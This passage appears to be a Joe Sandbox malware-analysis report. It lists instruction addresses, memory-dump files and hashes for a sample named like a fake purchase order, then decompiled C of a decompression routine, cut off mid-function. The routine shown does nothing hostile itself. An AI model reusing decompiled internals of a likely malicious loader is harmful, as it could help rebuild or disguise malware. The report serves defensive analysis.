                                                                                                                          0x0040634e
                                                                                                                          0x00406350
                                                                                                                          0x00406355
                                                                                                                          0x00406358
                                                                                                                          0x0040635b
                                                                                                                          0x0040635f
                                                                                                                          0x00406366
                                                                                                                          0x00406369
                                                                                                                          0x00406370
                                                                                                                          0x00406374
                                                                                                                          0x0040637c
                                                                                                                          0x0040637c
                                                                                                                          0x0040637c
                                                                                                                          0x00406376
                                                                                                                          0x00406376
                                                                                                                          0x00406376
                                                                                                                          0x0040636b
                                                                                                                          0x0040636b
                                                                                                                          0x0040636b
                                                                                                                          0x00406380
                                                                                                                          0x00406383
                                                                                                                          0x004063a1
                                                                                                                          0x004063a3
                                                                                                                          0x00000000
                                                                                                                          0x00406385
                                                                                                                          0x00406385
                                                                                                                          0x00406388
                                                                                                                          0x0040638b
                                                                                                                          0x0040638e
                                                                                                                          0x00406390
                                                                                                                          0x00406390
                                                                                                                          0x00406390
                                                                                                                          0x00406393
                                                                                                                          0x00406396
                                                                                                                          0x00406398
                                                                                                                          0x00406399
                                                                                                                          0x0040639c
                                                                                                                          0x00000000
                                                                                                                          0x0040639c
                                                                                                                          0x00000000
                                                                                                                          0x004065d2
                                                                                                                          0x004065d6
                                                                                                                          0x004065f4
                                                                                                                          0x004065f7
                                                                                                                          0x004065fe
                                                                                                                          0x00406601
                                                                                                                          0x00406604
                                                                                                                          0x00406607
                                                                                                                          0x0040660a
                                                                                                                          0x0040660d
                                                                                                                          0x0040660f
                                                                                                                          0x00406616
                                                                                                                          0x00406617
                                                                                                                          0x00406619
                                                                                                                          0x0040661c
                                                                                                                          0x0040661f
                                                                                                                          0x00406622
                                                                                                                          0x00406622
                                                                                                                          0x00406627
                                                                                                                          0x00000000
                                                                                                                          0x00406627
                                                                                                                          0x004065d8
                                                                                                                          0x004065db
                                                                                                                          0x004065de
                                                                                                                          0x004065e8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040663c
                                                                                                                          0x00406640
                                                                                                                          0x00406663
                                                                                                                          0x00406666
                                                                                                                          0x00406669
                                                                                                                          0x00406673
                                                                                                                          0x00406642
                                                                                                                          0x00406642
                                                                                                                          0x00406645
                                                                                                                          0x00406648
                                                                                                                          0x0040664b
                                                                                                                          0x00406658
                                                                                                                          0x0040665b
                                                                                                                          0x0040665b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066f0
                                                                                                                          0x004066f4
                                                                                                                          0x004066fb
                                                                                                                          0x004066fe
                                                                                                                          0x00406701
                                                                                                                          0x0040670b
                                                                                                                          0x00000000
                                                                                                                          0x0040670b
                                                                                                                          0x004066f6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406717
                                                                                                                          0x0040671b
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040671d
                                                                                                                          0x0040671d
                                                                                                                          0x0040671d
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067d7
                                                                                                                          0x004067d7
                                                                                                                          0x004067db
                                                                                                                          0x00406b79
                                                                                                                          0x00000000
                                                                                                                          0x00406b79
                                                                                                                          0x004067e1
                                                                                                                          0x004067e4
                                                                                                                          0x004067e7
                                                                                                                          0x004067eb
                                                                                                                          0x004067ee
                                                                                                                          0x004067f4
                                                                                                                          0x004067f6
                                                                                                                          0x004067f6
                                                                                                                          0x004067f6
                                                                                                                          0x004067f9
                                                                                                                          0x004067fc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063cc
                                                                                                                          0x004063cc
                                                                                                                          0x004063d0
                                                                                                                          0x00406b3d
                                                                                                                          0x00000000
                                                                                                                          0x00406b3d
                                                                                                                          0x004063d6
                                                                                                                          0x004063d9
                                                                                                                          0x004063dc
                                                                                                                          0x004063e0
                                                                                                                          0x004063e3
                                                                                                                          0x004063e9
                                                                                                                          0x004063eb
                                                                                                                          0x004063eb
                                                                                                                          0x004063eb
                                                                                                                          0x004063ee
                                                                                                                          0x004063f1
                                                                                                                          0x004063f1
                                                                                                                          0x004063f4
                                                                                                                          0x004063f7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063fd
                                                                                                                          0x00406403
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406409
                                                                                                                          0x00406409
                                                                                                                          0x0040640d
                                                                                                                          0x00406410
                                                                                                                          0x00406413
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641d
                                                                                                                          0x0040641f
                                                                                                                          0x00406425
                                                                                                                          0x00406428
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00406431
                                                                                                                          0x00406434
                                                                                                                          0x00406437
                                                                                                                          0x00406453
                                                                                                                          0x00406456
                                                                                                                          0x00406459
                                                                                                                          0x0040645c
                                                                                                                          0x00406463
                                                                                                                          0x00406467
                                                                                                                          0x00406469
                                                                                                                          0x0040646d
                                                                                                                          0x00406439
                                                                                                                          0x00406439
                                                                                                                          0x0040643d
                                                                                                                          0x00406445
                                                                                                                          0x0040644a
                                                                                                                          0x0040644c
                                                                                                                          0x0040644e
                                                                                                                          0x0040644e
                                                                                                                          0x00406470
                                                                                                                          0x00406477
                                                                                                                          0x0040647a
                                                                                                                          0x00000000
                                                                                                                          0x00406480
                                                                                                                          0x00000000
                                                                                                                          0x00406480
                                                                                                                          0x00000000
                                                                                                                          0x00406485
                                                                                                                          0x00406485
                                                                                                                          0x00406489
                                                                                                                          0x00406b49
                                                                                                                          0x00000000
                                                                                                                          0x00406b49
                                                                                                                          0x0040648f
                                                                                                                          0x00406492
                                                                                                                          0x00406495
                                                                                                                          0x00406499
                                                                                                                          0x0040649c
                                                                                                                          0x004064a2
                                                                                                                          0x004064a4
                                                                                                                          0x004064a4
                                                                                                                          0x004064a4
                                                                                                                          0x004064a7
                                                                                                                          0x004064aa
                                                                                                                          0x004064aa
                                                                                                                          0x004064aa
                                                                                                                          0x004064b0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004064b2
                                                                                                                          0x004064b5
                                                                                                                          0x004064b8
                                                                                                                          0x004064bb
                                                                                                                          0x004064be
                                                                                                                          0x004064c1
                                                                                                                          0x004064c4
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064cd
                                                                                                                          0x004064d0
                                                                                                                          0x004064e8
                                                                                                                          0x004064eb
                                                                                                                          0x004064ee
                                                                                                                          0x004064f1
                                                                                                                          0x004064f1
                                                                                                                          0x004064f4
                                                                                                                          0x004064f8
                                                                                                                          0x004064fa
                                                                                                                          0x004064d2
                                                                                                                          0x004064d2
                                                                                                                          0x004064da
                                                                                                                          0x004064df
                                                                                                                          0x004064e1
                                                                                                                          0x004064e3
                                                                                                                          0x004064e3
                                                                                                                          0x004064fd
                                                                                                                          0x00406504
                                                                                                                          0x00406507
                                                                                                                          0x00000000
                                                                                                                          0x00406509
                                                                                                                          0x00000000
                                                                                                                          0x00406509
                                                                                                                          0x00406507
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406549
                                                                                                                          0x00406549
                                                                                                                          0x0040654d
                                                                                                                          0x00406b55
                                                                                                                          0x00000000
                                                                                                                          0x00406b55
                                                                                                                          0x00406553
                                                                                                                          0x00406556
                                                                                                                          0x00406559
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406566
                                                                                                                          0x00406568
                                                                                                                          0x00406568
                                                                                                                          0x00406568
                                                                                                                          0x0040656b
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x00406574
                                                                                                                          0x00406512
                                                                                                                          0x00406512
                                                                                                                          0x00406515
                                                                                                                          0x00000000
                                                                                                                          0x00406515
                                                                                                                          0x00406576
                                                                                                                          0x00406576
                                                                                                                          0x00406579
                                                                                                                          0x0040657c
                                                                                                                          0x0040657f
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00406588
                                                                                                                          0x0040658b
                                                                                                                          0x0040658e
                                                                                                                          0x00406591
                                                                                                                          0x00406594
                                                                                                                          0x004065ac
                                                                                                                          0x004065af
                                                                                                                          0x004065b2
                                                                                                                          0x004065b5
                                                                                                                          0x004065b5
                                                                                                                          0x004065b8
                                                                                                                          0x004065bc
                                                                                                                          0x004065be
                                                                                                                          0x00406596
                                                                                                                          0x00406596
                                                                                                                          0x0040659e
                                                                                                                          0x004065a3
                                                                                                                          0x004065a5
                                                                                                                          0x004065a7
                                                                                                                          0x004065a7
                                                                                                                          0x004065c1
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x00000000
                                                                                                                          0x004065cd
                                                                                                                          0x00000000
                                                                                                                          0x004065cd
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x0040685a
                                                                                                                          0x0040685e
                                                                                                                          0x00406b85
                                                                                                                          0x00000000
                                                                                                                          0x00406b85
                                                                                                                          0x00406864
                                                                                                                          0x00406867
                                                                                                                          0x0040686a
                                                                                                                          0x0040686e
                                                                                                                          0x00406871
                                                                                                                          0x00406877
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x0040687c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406969
                                                                                                                          0x0040696d
                                                                                                                          0x0040698f
                                                                                                                          0x00406992
                                                                                                                          0x0040699c
                                                                                                                          0x00000000
                                                                                                                          0x0040699c
                                                                                                                          0x0040696f
                                                                                                                          0x00406972
                                                                                                                          0x00406976
                                                                                                                          0x00406979
                                                                                                                          0x00406979
                                                                                                                          0x0040697c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a26
                                                                                                                          0x00406a2a
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a4f
                                                                                                                          0x00406a56
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a5d
                                                                                                                          0x00000000
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a2c
                                                                                                                          0x00406a2f
                                                                                                                          0x00406a32
                                                                                                                          0x00406a35
                                                                                                                          0x00406a3c
                                                                                                                          0x00406980
                                                                                                                          0x00406980
                                                                                                                          0x00406983
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406b17
                                                                                                                          0x00406b1a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406751
                                                                                                                          0x00406753
                                                                                                                          0x0040675a
                                                                                                                          0x0040675b
                                                                                                                          0x0040675d
                                                                                                                          0x00406760
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406768
                                                                                                                          0x0040676b
                                                                                                                          0x0040676e
                                                                                                                          0x00406770
                                                                                                                          0x00406772
                                                                                                                          0x00406772
                                                                                                                          0x00406773
                                                                                                                          0x00406776
                                                                                                                          0x0040677d
                                                                                                                          0x00406780
                                                                                                                          0x0040678e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a64
                                                                                                                          0x00406a64
                                                                                                                          0x00406a67
                                                                                                                          0x00406a6e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a73
                                                                                                                          0x00406a73
                                                                                                                          0x00406a77
                                                                                                                          0x00406baf
                                                                                                                          0x00000000
                                                                                                                          0x00406baf
                                                                                                                          0x00406a7d
                                                                                                                          0x00406a80
                                                                                                                          0x00406a83
                                                                                                                          0x00406a87
                                                                                                                          0x00406a8a
                                                                                                                          0x00406a90
                                                                                                                          0x00406a92
                                                                                                                          0x00406a92
                                                                                                                          0x00406a92
                                                                                                                          0x00406a95
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a9b
                                                                                                                          0x00406a9b
                                                                                                                          0x00406a9f
                                                                                                                          0x00406aff
                                                                                                                          0x00406b02
                                                                                                                          0x00406b07
                                                                                                                          0x00406b08
                                                                                                                          0x00406b0a
                                                                                                                          0x00406b0c
                                                                                                                          0x00406b0f
                                                                                                                          0x00000000
                                                                                                                          0x00406b0f
                                                                                                                          0x00406aa1
                                                                                                                          0x00406aa7
                                                                                                                          0x00406aaa
                                                                                                                          0x00406aad
                                                                                                                          0x00406ab0
                                                                                                                          0x00406ab3
                                                                                                                          0x00406ab6
                                                                                                                          0x00406ab9
                                                                                                                          0x00406abc
                                                                                                                          0x00406abf
                                                                                                                          0x00406ac2
                                                                                                                          0x00406adb
                                                                                                                          0x00406ade
                                                                                                                          0x00406ae1
                                                                                                                          0x00406ae4
                                                                                                                          0x00406ae8
                                                                                                                          0x00406aea
                                                                                                                          0x00406aea
                                                                                                                          0x00406aeb
                                                                                                                          0x00406aee
                                                                                                                          0x00406ac4
                                                                                                                          0x00406ac4
                                                                                                                          0x00406acc
                                                                                                                          0x00406ad1
                                                                                                                          0x00406ad3
                                                                                                                          0x00406ad6
                                                                                                                          0x00406ad6
                                                                                                                          0x00406af1
                                                                                                                          0x00406af8
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00000000
                                                                                                                          0x00406796
                                                                                                                          0x00406799
                                                                                                                          0x004067cf
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x00406902
                                                                                                                          0x00406902
                                                                                                                          0x00406905
                                                                                                                          0x00406907
                                                                                                                          0x00406b91
                                                                                                                          0x00000000
                                                                                                                          0x00406b91
                                                                                                                          0x0040690d
                                                                                                                          0x00406910
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406916
                                                                                                                          0x0040691a
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x00000000
                                                                                                                          0x0040691d
                                                                                                                          0x0040679b
                                                                                                                          0x0040679d
                                                                                                                          0x0040679f
                                                                                                                          0x004067a1
                                                                                                                          0x004067a4
                                                                                                                          0x004067a5
                                                                                                                          0x004067a7
                                                                                                                          0x004067a9
                                                                                                                          0x004067ac
                                                                                                                          0x004067af
                                                                                                                          0x004067c5
                                                                                                                          0x004067ca
                                                                                                                          0x00406802
                                                                                                                          0x00406802
                                                                                                                          0x00406806
                                                                                                                          0x00406832
                                                                                                                          0x00406834
                                                                                                                          0x0040683b
                                                                                                                          0x0040683e
                                                                                                                          0x00406841
                                                                                                                          0x00406841
                                                                                                                          0x00406846
                                                                                                                          0x00406846
                                                                                                                          0x00406848
                                                                                                                          0x0040684b
                                                                                                                          0x00406852
                                                                                                                          0x00406855
                                                                                                                          0x00406882
                                                                                                                          0x00406882
                                                                                                                          0x00406885
                                                                                                                          0x00406888
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x00000000
                                                                                                                          0x004068fc
                                                                                                                          0x0040688a
                                                                                                                          0x00406890
                                                                                                                          0x00406893
                                                                                                                          0x00406896
                                                                                                                          0x00406899
                                                                                                                          0x0040689c
                                                                                                                          0x0040689f
                                                                                                                          0x004068a2
                                                                                                                          0x004068a5
                                                                                                                          0x004068a8
                                                                                                                          0x004068ab
                                                                                                                          0x004068c4
                                                                                                                          0x004068c6
                                                                                                                          0x004068c9
                                                                                                                          0x004068ca
                                                                                                                          0x004068cd
                                                                                                                          0x004068cf
                                                                                                                          0x004068d2
                                                                                                                          0x004068d4
                                                                                                                          0x004068d6
                                                                                                                          0x004068d9
                                                                                                                          0x004068db
                                                                                                                          0x004068de
                                                                                                                          0x004068e2
                                                                                                                          0x004068e4
                                                                                                                          0x004068e4
                                                                                                                          0x004068e5
                                                                                                                          0x004068e8
                                                                                                                          0x004068eb
                                                                                                                          0x004068ad
                                                                                                                          0x004068ad
                                                                                                                          0x004068b5
                                                                                                                          0x004068ba
                                                                                                                          0x004068bc
                                                                                                                          0x004068bf
                                                                                                                          0x004068bf
                                                                                                                          0x004068ee
                                                                                                                          0x004068f5
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x004068f5
                                                                                                                          0x00406808
                                                                                                                          0x0040680b
                                                                                                                          0x0040680d
                                                                                                                          0x00406810
                                                                                                                          0x00406813
                                                                                                                          0x00406816
                                                                                                                          0x00406818
                                                                                                                          0x0040681b
                                                                                                                          0x0040681e
                                                                                                                          0x0040681e
                                                                                                                          0x00406821
                                                                                                                          0x00406821
                                                                                                                          0x00406824
                                                                                                                          0x0040682b
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x0040682b
                                                                                                                          0x004067b1
                                                                                                                          0x004067b4
                                                                                                                          0x004067b6
                                                                                                                          0x004067b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406518
                                                                                                                          0x00406518
                                                                                                                          0x0040651c
                                                                                                                          0x00406b61
                                                                                                                          0x00000000
                                                                                                                          0x00406b61
                                                                                                                          0x00406522
                                                                                                                          0x00406525
                                                                                                                          0x00406528
                                                                                                                          0x0040652b
                                                                                                                          0x0040652e
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406536
                                                                                                                          0x00406539
                                                                                                                          0x0040653c
                                                                                                                          0x0040653f
                                                                                                                          0x00406541
                                                                                                                          0x00406541
                                                                                                                          0x00406541
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406924
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040692a
                                                                                                                          0x0040692d
                                                                                                                          0x00406930
                                                                                                                          0x00406933
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406938
                                                                                                                          0x0040693b
                                                                                                                          0x0040693e
                                                                                                                          0x00406941
                                                                                                                          0x00406944
                                                                                                                          0x00406947
                                                                                                                          0x00406948
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694d
                                                                                                                          0x00406950
                                                                                                                          0x00406953
                                                                                                                          0x00406956
                                                                                                                          0x00406959
                                                                                                                          0x0040695d
                                                                                                                          0x0040695f
                                                                                                                          0x00406962
                                                                                                                          0x00000000
                                                                                                                          0x00406964
                                                                                                                          0x00000000
                                                                                                                          0x00406964
                                                                                                                          0x00406962
                                                                                                                          0x00406b97
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061c6

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
                                                                                                                          • Instruction ID: 56628f401a4fc6d73e137493fcd66a1037cbd66c5efac646bb7951d26cabb475
                                                                                                                          • Opcode Fuzzy Hash: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
                                                                                                                          • Instruction Fuzzy Hash: CF815871D00228CFDF24CFA8C8447ADBBB1FB45305F25816AD856BB281D7789A96DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406184 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00406184(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406BD6))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
